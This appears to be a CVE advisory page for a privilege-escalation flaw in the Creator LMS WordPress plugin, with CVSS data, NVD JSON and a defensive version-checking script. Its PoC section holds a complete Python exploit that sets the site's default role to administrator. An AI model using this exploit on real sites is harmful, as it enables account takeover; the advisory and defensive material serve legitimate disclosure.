Security Vulnerability Report
CVE-2025-15347 CVSS 8.8 HIGH

CVE-2025-15347

Published: 2026-01-20 15:16:16
Last Modified: 2026-04-15 00:35:42

Description

The Creator LMS – The LMS for Creators, Coaches, and Trainers plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in the get_items_permissions_check function in all versions up to, and including, 1.1.12. This makes it possible for authenticated attackers, with contributor level access and above, to update arbitrary WordPress options.
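The advisory gives two things a defender can act on: an affected version range (all versions up to and including 1.1.12) and the nature of the bug (a REST permission callback that does not check a capability, CWE-862). The Python below is an added example, not code from this page or from the plugin's authors. It checks a plugin's `readme.txt` stable tag against the affected range and interprets the WordPress REST error codes a low-privilege write attempt can return, so that a 403 caused by a missing nonce is not mistaken for the capability check being present. The readme path follows the standard `wp-content/plugins/<slug>/readme.txt` layout, the slug `creatorlms` is taken from the changeset reference URL, the route path is not assumed (only the reply is classified), and the sample readme texts are constructed, not fetched from any site.

```python
import re
from typing import Optional

# CVE-2025-15347: all Creator LMS versions <= 1.1.12 are affected; the referenced changeset is tagged 1.1.13.
AFFECTED_MAX = "1.1.12"
# Plugin slug taken from the plugins.trac.wordpress.org reference path (creatorlms/tags/1.1.13).
PLUGIN_SLUG = "creatorlms"


def parse_version(v: str) -> tuple:
    """Split a dotted version into integers, ignoring non-numeric suffixes ('1.1.12-beta' -> (1, 1, 12))."""
    parts = []
    for piece in v.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def version_le(a: str, b: str) -> bool:
    """True when a <= b, padding the shorter tuple with zeros so '1.1' equals '1.1.0'."""
    pa, pb = parse_version(a), parse_version(b)
    width = max(len(pa), len(pb))
    pa += (0,) * (width - len(pa))
    pb += (0,) * (width - len(pb))
    return pa <= pb


def stable_tag(readme: str) -> Optional[str]:
    """Extract the 'Stable tag:' line from a WordPress.org plugin readme.txt."""
    m = re.search(r"^Stable tag:\s*([\w.\-]+)", readme, re.IGNORECASE | re.MULTILINE)
    return m.group(1) if m else None


def readme_url(base_url: str) -> str:
    """Assumed readme location on a target, using the standard wp-content plugin layout."""
    return f"{base_url.rstrip('/')}/wp-content/plugins/{PLUGIN_SLUG}/readme.txt"


def is_affected(readme: str) -> Optional[bool]:
    """None when the version cannot be determined (no tag, or 'trunk'), otherwise the verdict."""
    tag = stable_tag(readme)
    if tag is None or tag.lower() == "trunk":
        return None
    return version_le(tag, AFFECTED_MAX)


def classify_rest_response(status: int, body) -> str:
    """Interpret a WordPress REST reply to a write attempt made with a low-privilege account.

    WP core error codes used here: rest_no_route (404, route not registered),
    rest_cookie_invalid_nonce (403, cookie auth was not applied so the caller counted as
    anonymous) and rest_forbidden (401 anonymous / 403 logged in but lacking the capability).
    """
    code = body.get("code") if isinstance(body, dict) else None
    if code == "rest_no_route":
        return "no-route"
    if code == "rest_cookie_invalid_nonce":
        return "nonce-missing"   # not a permission verdict: retry with a valid X-WP-Nonce
    if code == "rest_forbidden" or status in (401, 403):
        return "denied"          # the permission callback rejected the caller
    if 200 <= status < 300:
        return "accepted"        # a contributor-level write went through: the CVE condition
    return "unknown"


# Constructed sample readmes (not fetched from any site).
SAMPLE_VULNERABLE = "=== Creator LMS ===\nContributors: example\nStable tag: 1.1.12\nTested up to: 6.7\n"
SAMPLE_PATCHED = "=== Creator LMS ===\nStable tag: 1.1.13\n"
SAMPLE_TRUNK = "=== Creator LMS ===\nStable tag: trunk\n"

if __name__ == "__main__":
    for name, text in [("vulnerable", SAMPLE_VULNERABLE), ("patched", SAMPLE_PATCHED), ("trunk", SAMPLE_TRUNK)]:
        print(name, stable_tag(text), is_affected(text))
    print(classify_rest_response(403, {"code": "rest_cookie_invalid_nonce", "message": "Cookie check failed"}))
```

The classifier matters for the PoC further down this page: a cookie-authenticated REST call without a valid `X-WP-Nonce` is downgraded to anonymous by WordPress core before any plugin code runs, so a 403 from such a call says nothing about whether the plugin's capability check is present.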

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)


Creator LMS plugin <= 1.1.12 (affected); the fix is in the 1.1.13 changeset to includes/Rest/V1/SettingsController.php referenced below.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# CVE-2025-15347 PoC - Creator LMS Privilege Escalation
# Target: WordPress site with Creator LMS plugin <= 1.1.12
# Requires an existing account with contributor-level access or above.
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"


def get_auth_session():
    """Authenticate through wp-login.php and return a session carrying the WordPress auth cookies."""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    # wp-login.php rejects the POST unless the test cookie it sets on GET is sent back.
    session.get(login_url)
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)
    # A successful login sets a wordpress_logged_in_* cookie.
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.keys()):
        return None
    return session


def get_rest_nonce(session):
    """Cookie-authenticated REST requests need a valid X-WP-Nonce; without one WordPress
    treats the caller as anonymous. Core hands out a fresh nonce via admin-ajax.php?action=rest-nonce."""
    response = session.get(f"{TARGET_URL}/wp-admin/admin-ajax.php", params={'action': 'rest-nonce'})
    return response.text.strip() if response.ok else None


def exploit_privilege_escalation(session):
    """Exploit CVE-2025-15347 to change WordPress options"""
    # REST API endpoint for Creator LMS settings
    api_url = f"{TARGET_URL}/wp-json/creatorlms/v1/settings"

    # Malicious payload - change the default role to administrator so self-registration yields admin accounts
    payload = {
        'default_role': 'administrator',
        'users_can_register': '1'
    }

    headers = {
        'Content-Type': 'application/json',
        'X-WP-Nonce': get_rest_nonce(session) or ''
    }

    # Send request to modify options
    response = session.post(api_url, json=payload, headers=headers)

    print(f"Response Status: {response.status_code}")
    print(f"Response Body: {response.text}")

    # A 403 with code rest_cookie_invalid_nonce means the nonce was rejected, not that the fix is in place.
    return response.status_code == 200


if __name__ == "__main__":
    print("[*] CVE-2025-15347 Exploitation")
    session = get_auth_session()
    if session:
        print("[+] Authentication successful")
        if exploit_privilege_escalation(session):
            print("[+] Privilege escalation successful!")
            print("[+] Default role changed to administrator")
    else:
        print("[-] Authentication failed")

References

https://plugins.trac.wordpress.org/changeset/3433193/creatorlms/tags/1.1.13/includes/Rest/V1/SettingsController.php (fix changeset, 1.1.13)
https://www.wordfence.com/threat-intel/vulnerabilities/id/4bddaefc-9ddc-4798-acb6-7b87f7c924a1?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-15347",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-20T15:16:15.553",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Creator LMS – The LMS for Creators, Coaches, and Trainers plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in the get_items_permissions_check function in all versions up to, and including, 1.1.12. This makes it possible for authenticated attackers, with contributor level access and above, to update arbitrary WordPress options."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3433193/creatorlms/tags/1.1.13/includes/Rest/V1/SettingsController.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4bddaefc-9ddc-4798-acb6-7b87f7c924a1?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}